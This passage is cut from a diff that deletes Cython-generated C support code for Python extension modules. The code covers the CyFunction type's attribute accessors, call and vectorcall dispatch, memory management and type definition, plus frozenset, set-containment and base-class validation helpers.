*context) { - CYTHON_UNUSED_VAR(context); - return PyObject_GetAttrString(op->func, "__module__"); -} -static int -__Pyx_CyFunction_set_module(__pyx_CyFunctionObject *op, PyObject* value, void *context) { - CYTHON_UNUSED_VAR(context); - return PyObject_SetAttrString(op->func, "__module__", value); -} -#endif -static PyGetSetDef __pyx_CyFunction_getsets[] = { - {(char *) "func_doc", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, - {(char *) "__doc__", (getter)__Pyx_CyFunction_get_doc, (setter)__Pyx_CyFunction_set_doc, 0, 0}, - {(char *) "func_name", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, - {(char *) "__name__", (getter)__Pyx_CyFunction_get_name, (setter)__Pyx_CyFunction_set_name, 0, 0}, - {(char *) "__qualname__", (getter)__Pyx_CyFunction_get_qualname, (setter)__Pyx_CyFunction_set_qualname, 0, 0}, - {(char *) "func_dict", (getter)__Pyx_CyFunction_get_dict, (setter)__Pyx_CyFunction_set_dict, 0, 0}, - {(char *) "__dict__", (getter)__Pyx_CyFunction_get_dict, 
(setter)__Pyx_CyFunction_set_dict, 0, 0}, - {(char *) "func_globals", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, - {(char *) "__globals__", (getter)__Pyx_CyFunction_get_globals, 0, 0, 0}, - {(char *) "func_closure", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, - {(char *) "__closure__", (getter)__Pyx_CyFunction_get_closure, 0, 0, 0}, - {(char *) "func_code", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, - {(char *) "__code__", (getter)__Pyx_CyFunction_get_code, 0, 0, 0}, - {(char *) "func_defaults", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, - {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, - {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, - {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, - {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, -#if CYTHON_COMPILING_IN_LIMITED_API - {"__module__", (getter)__Pyx_CyFunction_get_module, (setter)__Pyx_CyFunction_set_module, 0, 0}, -#endif - {0, 0, 0, 0, 0} -}; -static PyMemberDef __pyx_CyFunction_members[] = { -#if !CYTHON_COMPILING_IN_LIMITED_API - {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, -#endif -#if CYTHON_USE_TYPE_SPECS - {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, -#if CYTHON_METH_FASTCALL -#if CYTHON_BACKPORT_VECTORCALL - {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, -#else -#if !CYTHON_COMPILING_IN_LIMITED_API - {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, -#endif -#endif -#endif -#if PY_VERSION_HEX < 0x030500A0 || CYTHON_COMPILING_IN_LIMITED_API - {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, 
func_weakreflist), READONLY, 0}, -#else - {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, -#endif -#endif - {0, 0, 0, 0, 0} -}; -static PyObject * -__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) -{ - CYTHON_UNUSED_VAR(args); -#if PY_MAJOR_VERSION >= 3 - Py_INCREF(m->func_qualname); - return m->func_qualname; -#else - return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); -#endif -} -static PyMethodDef __pyx_CyFunction_methods[] = { - {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, - {0, 0, 0, 0} -}; -#if PY_VERSION_HEX < 0x030500A0 || CYTHON_COMPILING_IN_LIMITED_API -#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) -#else -#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) -#endif -static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, - PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { -#if !CYTHON_COMPILING_IN_LIMITED_API - PyCFunctionObject *cf = (PyCFunctionObject*) op; -#endif - if (unlikely(op == NULL)) - return NULL; -#if CYTHON_COMPILING_IN_LIMITED_API - op->func = PyCFunction_NewEx(ml, (PyObject*)op, module); - if (unlikely(!op->func)) return NULL; -#endif - op->flags = flags; - __Pyx_CyFunction_weakreflist(op) = NULL; -#if !CYTHON_COMPILING_IN_LIMITED_API - cf->m_ml = ml; - cf->m_self = (PyObject *) op; -#endif - Py_XINCREF(closure); - op->func_closure = closure; -#if !CYTHON_COMPILING_IN_LIMITED_API - Py_XINCREF(module); - cf->m_module = module; -#endif - op->func_dict = NULL; - op->func_name = NULL; - Py_INCREF(qualname); - op->func_qualname = qualname; - op->func_doc = NULL; -#if PY_VERSION_HEX < 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - op->func_classobj = NULL; -#else - ((PyCMethodObject*)op)->mm_class = NULL; -#endif - op->func_globals = globals; - Py_INCREF(op->func_globals); - 
Py_XINCREF(code); - op->func_code = code; - op->defaults_pyobjects = 0; - op->defaults_size = 0; - op->defaults = NULL; - op->defaults_tuple = NULL; - op->defaults_kwdict = NULL; - op->defaults_getter = NULL; - op->func_annotations = NULL; - op->func_is_coroutine = NULL; -#if CYTHON_METH_FASTCALL - switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { - case METH_NOARGS: - __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; - break; - case METH_O: - __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; - break; - case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: - __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; - break; - case METH_FASTCALL | METH_KEYWORDS: - __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; - break; - case METH_VARARGS | METH_KEYWORDS: - __Pyx_CyFunction_func_vectorcall(op) = NULL; - break; - default: - PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); - Py_DECREF(op); - return NULL; - } -#endif - return (PyObject *) op; -} -static int -__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) -{ - Py_CLEAR(m->func_closure); -#if CYTHON_COMPILING_IN_LIMITED_API - Py_CLEAR(m->func); -#else - Py_CLEAR(((PyCFunctionObject*)m)->m_module); -#endif - Py_CLEAR(m->func_dict); - Py_CLEAR(m->func_name); - Py_CLEAR(m->func_qualname); - Py_CLEAR(m->func_doc); - Py_CLEAR(m->func_globals); - Py_CLEAR(m->func_code); -#if !CYTHON_COMPILING_IN_LIMITED_API -#if PY_VERSION_HEX < 0x030900B1 - Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); -#else - { - PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; - ((PyCMethodObject *) (m))->mm_class = NULL; - Py_XDECREF(cls); - } -#endif -#endif - Py_CLEAR(m->defaults_tuple); - Py_CLEAR(m->defaults_kwdict); - Py_CLEAR(m->func_annotations); - Py_CLEAR(m->func_is_coroutine); - if (m->defaults) { - PyObject **pydefaults = 
__Pyx_CyFunction_Defaults(PyObject *, m); - int i; - for (i = 0; i < m->defaults_pyobjects; i++) - Py_XDECREF(pydefaults[i]); - PyObject_Free(m->defaults); - m->defaults = NULL; - } - return 0; -} -static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) -{ - if (__Pyx_CyFunction_weakreflist(m) != NULL) - PyObject_ClearWeakRefs((PyObject *) m); - __Pyx_CyFunction_clear(m); - __Pyx_PyHeapTypeObject_GC_Del(m); -} -static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) -{ - PyObject_GC_UnTrack(m); - __Pyx__CyFunction_dealloc(m); -} -static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) -{ - Py_VISIT(m->func_closure); -#if CYTHON_COMPILING_IN_LIMITED_API - Py_VISIT(m->func); -#else - Py_VISIT(((PyCFunctionObject*)m)->m_module); -#endif - Py_VISIT(m->func_dict); - Py_VISIT(m->func_name); - Py_VISIT(m->func_qualname); - Py_VISIT(m->func_doc); - Py_VISIT(m->func_globals); - Py_VISIT(m->func_code); -#if !CYTHON_COMPILING_IN_LIMITED_API - Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); -#endif - Py_VISIT(m->defaults_tuple); - Py_VISIT(m->defaults_kwdict); - Py_VISIT(m->func_is_coroutine); - if (m->defaults) { - PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); - int i; - for (i = 0; i < m->defaults_pyobjects; i++) - Py_VISIT(pydefaults[i]); - } - return 0; -} -static PyObject* -__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) -{ -#if PY_MAJOR_VERSION >= 3 - return PyUnicode_FromFormat("<cyfunction %U at %p>", - op->func_qualname, (void *)op); -#else - return PyString_FromFormat("<cyfunction %s at %p>", - PyString_AsString(op->func_qualname), (void *)op); -#endif -} -static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { -#if CYTHON_COMPILING_IN_LIMITED_API - PyObject *f = ((__pyx_CyFunctionObject*)func)->func; - PyObject *py_name = NULL; - PyCFunction meth; - int flags; - meth = PyCFunction_GetFunction(f); - if (unlikely(!meth)) return NULL; - flags = PyCFunction_GetFlags(f); - if (unlikely(flags 
< 0)) return NULL; -#else - PyCFunctionObject* f = (PyCFunctionObject*)func; - PyCFunction meth = f->m_ml->ml_meth; - int flags = f->m_ml->ml_flags; -#endif - Py_ssize_t size; - switch (flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { - case METH_VARARGS: - if (likely(kw == NULL || PyDict_Size(kw) == 0)) - return (*meth)(self, arg); - break; - case METH_VARARGS | METH_KEYWORDS: - return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); - case METH_NOARGS: - if (likely(kw == NULL || PyDict_Size(kw) == 0)) { -#if CYTHON_ASSUME_SAFE_MACROS - size = PyTuple_GET_SIZE(arg); -#else - size = PyTuple_Size(arg); - if (unlikely(size < 0)) return NULL; -#endif - if (likely(size == 0)) - return (*meth)(self, NULL); -#if CYTHON_COMPILING_IN_LIMITED_API - py_name = __Pyx_CyFunction_get_name((__pyx_CyFunctionObject*)func, NULL); - if (!py_name) return NULL; - PyErr_Format(PyExc_TypeError, - "%.200S() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", - py_name, size); - Py_DECREF(py_name); -#else - PyErr_Format(PyExc_TypeError, - "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", - f->m_ml->ml_name, size); -#endif - return NULL; - } - break; - case METH_O: - if (likely(kw == NULL || PyDict_Size(kw) == 0)) { -#if CYTHON_ASSUME_SAFE_MACROS - size = PyTuple_GET_SIZE(arg); -#else - size = PyTuple_Size(arg); - if (unlikely(size < 0)) return NULL; -#endif - if (likely(size == 1)) { - PyObject *result, *arg0; - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - arg0 = PyTuple_GET_ITEM(arg, 0); - #else - arg0 = __Pyx_PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; - #endif - result = (*meth)(self, arg0); - #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) - Py_DECREF(arg0); - #endif - return result; - } -#if CYTHON_COMPILING_IN_LIMITED_API - py_name = __Pyx_CyFunction_get_name((__pyx_CyFunctionObject*)func, NULL); - if (!py_name) return NULL; - PyErr_Format(PyExc_TypeError, - "%.200S() takes exactly one 
argument (%" CYTHON_FORMAT_SSIZE_T "d given)", - py_name, size); - Py_DECREF(py_name); -#else - PyErr_Format(PyExc_TypeError, - "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", - f->m_ml->ml_name, size); -#endif - return NULL; - } - break; - default: - PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); - return NULL; - } -#if CYTHON_COMPILING_IN_LIMITED_API - py_name = __Pyx_CyFunction_get_name((__pyx_CyFunctionObject*)func, NULL); - if (!py_name) return NULL; - PyErr_Format(PyExc_TypeError, "%.200S() takes no keyword arguments", - py_name); - Py_DECREF(py_name); -#else - PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", - f->m_ml->ml_name); -#endif - return NULL; -} -static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { - PyObject *self, *result; -#if CYTHON_COMPILING_IN_LIMITED_API - self = PyCFunction_GetSelf(((__pyx_CyFunctionObject*)func)->func); - if (unlikely(!self) && PyErr_Occurred()) return NULL; -#else - self = ((PyCFunctionObject*)func)->m_self; -#endif - result = __Pyx_CyFunction_CallMethod(func, self, arg, kw); - return result; -} -static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { - PyObject *result; - __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; -#if CYTHON_METH_FASTCALL - __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); - if (vc) { -#if CYTHON_ASSUME_SAFE_MACROS - return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); -#else - (void) &__Pyx_PyVectorcall_FastCallDict; - return PyVectorcall_Call(func, args, kw); -#endif - } -#endif - if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { - Py_ssize_t argc; - PyObject *new_args; - PyObject *self; -#if CYTHON_ASSUME_SAFE_MACROS - argc = PyTuple_GET_SIZE(args); -#else - argc = PyTuple_Size(args); - if 
(unlikely(argc < 0)) return NULL; -#endif - new_args = PyTuple_GetSlice(args, 1, argc); - if (unlikely(!new_args)) - return NULL; - self = PyTuple_GetItem(args, 0); - if (unlikely(!self)) { - Py_DECREF(new_args); -#if PY_MAJOR_VERSION > 2 - PyErr_Format(PyExc_TypeError, - "unbound method %.200S() needs an argument", - cyfunc->func_qualname); -#else - PyErr_SetString(PyExc_TypeError, - "unbound method needs an argument"); -#endif - return NULL; - } - result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); - Py_DECREF(new_args); - } else { - result = __Pyx_CyFunction_Call(func, args, kw); - } - return result; -} -#if CYTHON_METH_FASTCALL -static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) -{ - int ret = 0; - if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { - if (unlikely(nargs < 1)) { - PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", - ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); - return -1; - } - ret = 1; - } - if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { - PyErr_Format(PyExc_TypeError, - "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); - return -1; - } - return ret; -} -static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) -{ - __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; - PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; -#if CYTHON_BACKPORT_VECTORCALL - Py_ssize_t nargs = (Py_ssize_t)nargsf; -#else - Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); -#endif - PyObject *self; - switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { - case 1: - self = args[0]; - args += 1; - nargs -= 1; - break; - case 0: - self = ((PyCFunctionObject*)cyfunc)->m_self; - break; - default: - return NULL; - } - if (unlikely(nargs != 0)) { - 
PyErr_Format(PyExc_TypeError, - "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", - def->ml_name, nargs); - return NULL; - } - return def->ml_meth(self, NULL); -} -static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) -{ - __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; - PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; -#if CYTHON_BACKPORT_VECTORCALL - Py_ssize_t nargs = (Py_ssize_t)nargsf; -#else - Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); -#endif - PyObject *self; - switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { - case 1: - self = args[0]; - args += 1; - nargs -= 1; - break; - case 0: - self = ((PyCFunctionObject*)cyfunc)->m_self; - break; - default: - return NULL; - } - if (unlikely(nargs != 1)) { - PyErr_Format(PyExc_TypeError, - "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", - def->ml_name, nargs); - return NULL; - } - return def->ml_meth(self, args[0]); -} -static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) -{ - __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; - PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; -#if CYTHON_BACKPORT_VECTORCALL - Py_ssize_t nargs = (Py_ssize_t)nargsf; -#else - Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); -#endif - PyObject *self; - switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { - case 1: - self = args[0]; - args += 1; - nargs -= 1; - break; - case 0: - self = ((PyCFunctionObject*)cyfunc)->m_self; - break; - default: - return NULL; - } - return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); -} -static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) -{ - __pyx_CyFunctionObject *cyfunc = 
(__pyx_CyFunctionObject *)func; - PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; - PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); -#if CYTHON_BACKPORT_VECTORCALL - Py_ssize_t nargs = (Py_ssize_t)nargsf; -#else - Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); -#endif - PyObject *self; - switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { - case 1: - self = args[0]; - args += 1; - nargs -= 1; - break; - case 0: - self = ((PyCFunctionObject*)cyfunc)->m_self; - break; - default: - return NULL; - } - return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); -} -#endif -#if CYTHON_USE_TYPE_SPECS -static PyType_Slot __pyx_CyFunctionType_slots[] = { - {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, - {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, - {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, - {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, - {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, - {Py_tp_methods, (void *)__pyx_CyFunction_methods}, - {Py_tp_members, (void *)__pyx_CyFunction_members}, - {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, - {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, - {0, 0}, -}; -static PyType_Spec __pyx_CyFunctionType_spec = { - __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", - sizeof(__pyx_CyFunctionObject), - 0, -#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR - Py_TPFLAGS_METHOD_DESCRIPTOR | -#endif -#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) - _Py_TPFLAGS_HAVE_VECTORCALL | -#endif - Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, - __pyx_CyFunctionType_slots -}; -#else -static PyTypeObject __pyx_CyFunctionType_type = { - PyVarObject_HEAD_INIT(0, 0) - __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", - sizeof(__pyx_CyFunctionObject), - 0, - (destructor) __Pyx_CyFunction_dealloc, -#if !CYTHON_METH_FASTCALL - 0, -#elif CYTHON_BACKPORT_VECTORCALL - (printfunc)offsetof(__pyx_CyFunctionObject, 
func_vectorcall), -#else - offsetof(PyCFunctionObject, vectorcall), -#endif - 0, - 0, -#if PY_MAJOR_VERSION < 3 - 0, -#else - 0, -#endif - (reprfunc) __Pyx_CyFunction_repr, - 0, - 0, - 0, - 0, - __Pyx_CyFunction_CallAsMethod, - 0, - 0, - 0, - 0, -#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR - Py_TPFLAGS_METHOD_DESCRIPTOR | -#endif -#if defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL - _Py_TPFLAGS_HAVE_VECTORCALL | -#endif - Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, - 0, - (traverseproc) __Pyx_CyFunction_traverse, - (inquiry) __Pyx_CyFunction_clear, - 0, -#if PY_VERSION_HEX < 0x030500A0 - offsetof(__pyx_CyFunctionObject, func_weakreflist), -#else - offsetof(PyCFunctionObject, m_weakreflist), -#endif - 0, - 0, - __pyx_CyFunction_methods, - __pyx_CyFunction_members, - __pyx_CyFunction_getsets, - 0, - 0, - __Pyx_PyMethod_New, - 0, - offsetof(__pyx_CyFunctionObject, func_dict), - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, - 0, -#if PY_VERSION_HEX >= 0x030400a1 - 0, -#endif -#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) - 0, -#endif -#if __PYX_NEED_TP_PRINT_SLOT - 0, -#endif -#if PY_VERSION_HEX >= 0x030C0000 - 0, -#endif -#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 - 0, -#endif -}; -#endif -static int __pyx_CyFunction_init(PyObject *module) { -#if CYTHON_USE_TYPE_SPECS - __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); -#else - CYTHON_UNUSED_VAR(module); - __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); -#endif - if (unlikely(__pyx_CyFunctionType == NULL)) { - return -1; - } - return 0; -} -static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { - __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; - m->defaults = PyObject_Malloc(size); - if (unlikely(!m->defaults)) - return PyErr_NoMemory(); - 
memset(m->defaults, 0, size); - m->defaults_pyobjects = pyobjects; - m->defaults_size = size; - return m->defaults; -} -static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { - __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; - m->defaults_tuple = tuple; - Py_INCREF(tuple); -} -static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { - __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; - m->defaults_kwdict = dict; - Py_INCREF(dict); -} -static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { - __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; - m->func_annotations = dict; - Py_INCREF(dict); -} - -/* CythonFunction */ -static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, - PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { - PyObject *op = __Pyx_CyFunction_Init( - PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), - ml, flags, qualname, closure, module, globals, code - ); - if (likely(op)) { - PyObject_GC_Track(op); - } - return op; -} - -/* pyfrozenset_new */ -static CYTHON_INLINE PyObject* __Pyx_PyFrozenSet_New(PyObject* it) { - if (it) { - PyObject* result; -#if CYTHON_COMPILING_IN_PYPY - PyObject* args; - args = PyTuple_Pack(1, it); - if (unlikely(!args)) - return NULL; - result = PyObject_Call((PyObject*)&PyFrozenSet_Type, args, NULL); - Py_DECREF(args); - return result; -#else - if (PyFrozenSet_CheckExact(it)) { - Py_INCREF(it); - return it; - } - result = PyFrozenSet_New(it); - if (unlikely(!result)) - return NULL; - if ((PY_VERSION_HEX >= 0x031000A1) || likely(PySet_GET_SIZE(result))) - return result; - Py_DECREF(result); -#endif - } -#if CYTHON_USE_TYPE_SLOTS - return PyFrozenSet_Type.tp_new(&PyFrozenSet_Type, __pyx_empty_tuple, NULL); -#else - return PyObject_Call((PyObject*)&PyFrozenSet_Type, __pyx_empty_tuple, NULL); -#endif -} - -/* 
PySetContains */ -static int __Pyx_PySet_ContainsUnhashable(PyObject *set, PyObject *key) { - int result = -1; - if (PySet_Check(key) && PyErr_ExceptionMatches(PyExc_TypeError)) { - PyObject *tmpkey; - PyErr_Clear(); - tmpkey = __Pyx_PyFrozenSet_New(key); - if (tmpkey != NULL) { - result = PySet_Contains(set, tmpkey); - Py_DECREF(tmpkey); - } - } - return result; -} -static CYTHON_INLINE int __Pyx_PySet_ContainsTF(PyObject* key, PyObject* set, int eq) { - int result = PySet_Contains(set, key); - if (unlikely(result < 0)) { - result = __Pyx_PySet_ContainsUnhashable(set, key); - } - return unlikely(result < 0) ? result : (result == (eq == Py_EQ)); -} - -/* PyObjectCallMethod0 */ -static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { - PyObject *method = NULL, *result = NULL; - int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); - if (likely(is_method)) { - result = __Pyx_PyObject_CallOneArg(method, obj); - Py_DECREF(method); - return result; - } - if (unlikely(!method)) goto bad; - result = __Pyx_PyObject_CallNoArg(method); - Py_DECREF(method); -bad: - return result; -} - -/* ValidateBasesTuple */ -#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS -static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases) { - Py_ssize_t i, n; -#if CYTHON_ASSUME_SAFE_MACROS - n = PyTuple_GET_SIZE(bases); -#else - n = PyTuple_Size(bases); - if (n < 0) return -1; -#endif - for (i = 1; i < n; i++) - { -#if CYTHON_AVOID_BORROWED_REFS - PyObject *b0 = PySequence_GetItem(bases, i); - if (!b0) return -1; -#elif CYTHON_ASSUME_SAFE_MACROS - PyObject *b0 = PyTuple_GET_ITEM(bases, i); -#else - PyObject *b0 = PyTuple_GetItem(bases, i); - if (!b0) return -1; -#endif - PyTypeObject *b; -#if PY_MAJOR_VERSION < 3 - if (PyClass_Check(b0)) - { - PyErr_Format(PyExc_TypeError, "base class '%.200s' is an old-style class", - PyString_AS_STRING(((PyClassObject*)b0)->cl_name)); 
-#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - return -1; - } -#endif - b = (PyTypeObject*) b0; - if (!__Pyx_PyType_HasFeature(b, Py_TPFLAGS_HEAPTYPE)) - { - __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); - PyErr_Format(PyExc_TypeError, - "base class '" __Pyx_FMT_TYPENAME "' is not a heap type", b_name); - __Pyx_DECREF_TypeName(b_name); -#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - return -1; - } -#if !CYTHON_USE_TYPE_SLOTS - if (dictoffset == 0) { - PyErr_Format(PyExc_TypeError, - "extension type '%.200s': " - "unable to validate whether bases have a __dict__ " - "when CYTHON_USE_TYPE_SLOTS is off " - "(likely because you are building in the limited API). " - "Therefore, all extension types with multiple bases " - "must add 'cdef dict __dict__' in this compilation mode", - type_name); -#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - return -1; - } -#else - if (dictoffset == 0 && b->tp_dictoffset) - { - __Pyx_TypeName b_name = __Pyx_PyType_GetName(b); - PyErr_Format(PyExc_TypeError, - "extension type '%.200s' has no __dict__ slot, " - "but base type '" __Pyx_FMT_TYPENAME "' has: " - "either add 'cdef dict __dict__' to the extension type " - "or add '__slots__ = [...]' to the base type", - type_name, b_name); - __Pyx_DECREF_TypeName(b_name); -#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - return -1; - } -#endif -#if CYTHON_AVOID_BORROWED_REFS - Py_DECREF(b0); -#endif - } - return 0; -} -#endif - -/* 